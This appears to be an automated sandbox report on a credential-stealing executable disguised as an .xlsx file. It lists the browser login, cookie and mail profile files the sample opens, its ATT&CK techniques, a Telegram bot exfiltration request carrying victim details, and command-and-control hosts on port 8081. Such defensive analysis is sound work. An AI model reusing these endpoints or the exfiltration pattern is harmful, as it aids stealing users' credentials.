                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR

                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTR
                    MITRE ATT&CK Matrix (only techniques matched by at least one signature are listed; the number in parentheses is the count of matching signatures):

                    Execution: Native API (1)
                    Persistence: DLL Side-Loading (1)
                    Privilege Escalation: DLL Side-Loading (1); Process Injection (12)
                    Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (131); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (12)
                    Credential Access: OS Credential Dumping (1)
                    Discovery: System Information Discovery (13); Query Registry (1); Security Software Discovery (1); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
                    Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Clipboard Data (1)
                    Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (3); Application Layer Protocol (24)
                    Exfiltration: Exfiltration Over Alternative Protocol (1)

                    No technique was matched under Reconnaissance, Resource Development, Initial Access, Lateral Movement or Impact.

                    Source | Detection | Scanner | Label | Link
                    DC74433Y7889021.xlsx.exe | 100% | Avira | HEUR/AGEN.1309271
                    DC74433Y7889021.xlsx.exe | 100% | Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
                    http://www.fontbureau.com | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
                    https://www.office.com/ | 0% | Avira URL Cloud | safe
                    http://www.tiro.com | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers | 0% | URL Reputation | safe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe
                    http://www.goodfont.co.kr | 0% | URL Reputation | safe
                    https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
                    http://www.carterandcone.coml | 0% | URL Reputation | safe
                    http://www.sajatypeworks.com | 0% | URL Reputation | safe
                    http://www.typography.netD | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
                    http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                    https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
                    http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
                    http://checkip.dyndns.org/ | 0% | URL Reputation | safe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | URL Reputation | safe
                    http://checkip.dyndns.org/q | 0% | URL Reputation | safe
                    http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                    http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                    http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
                    http://www.fonts.com | 0% | URL Reputation | safe
                    http://www.sandoll.co.kr | 0% | URL Reputation | safe
                    http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | URL Reputation | safe
                    http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://www.sakkal.com | 0% | URL Reputation | safe
                    https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
                    https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
                    http://varders.kozow.com:8081 | 0% | Avira URL Cloud | safe
                    http://51.38.247.67:8081/_send_.php?L | 0% | Avira URL Cloud | safe
                    http://anotherarmy.dns.army:8081 | 100% | Avira URL Cloud | malware
                    http://aborters.duckdns.org:8081 | 100% | Avira URL Cloud | malware
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | Avira URL Cloud | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    reallyfreegeoip.org | 188.114.97.3 | Active: true | Malicious: true | Reputation: unknown
                    s4.serv00.com | 213.189.52.181 | Active: true | Malicious: true | Reputation: unknown
                    api.telegram.org | 149.154.167.220 | Active: true | Malicious: true | Reputation: unknown
                    checkip.dyndns.com | 193.122.130.0 | Active: true | Malicious: false | Reputation: unknown
                    checkip.dyndns.org | IP: unknown | Active: unknown | Malicious: true | Reputation: unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | Malicious: false | Reputation: unknown
                    https://reallyfreegeoip.org/xml/8.46.123.33 | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://checkip.dyndns.org/ | Malicious: false | URL Reputation: safe | Reputation: unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    https://www.office.com/ | DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    http://www.apache.org/licenses/LICENSE-2.0 | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designersG | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designers/? | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.founder.com.cn/cn/bThe | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    https://api.telegram.org/bot | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024DF000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    http://www.fontbureau.com/designers? | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.tiro.com | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designers | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.goodfont.co.kr | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    https://chrome.google.com/webstore?hl=en | DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    http://varders.kozow.com:8081 | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    http://www.carterandcone.coml | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.sajatypeworks.com | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://aborters.duckdns.org:8081 | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
                    http://www.typography.netD | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designers/cabarga.htmlN | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.founder.com.cn/cn/cThe | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.galapagosdesign.com/staff/dennis.htm | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.founder.com.cn/cn | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designers/frere-user.html | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://51.38.247.67:8081/_send_.php?L | DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
                    http://anotherarmy.dns.army:8081 | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://checkip.dyndns.org/q | DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.jiyu-kobo.co.jp/ | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.galapagosdesign.com/DPlease | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fontbureau.com/designers8 | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.fonts.com | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.sandoll.co.kr | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.urwpp.deDPlease | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.zhongyicts.com.cn | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
                    http://www.sakkal.com | DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | URL Reputation: safe | Reputation: unknown
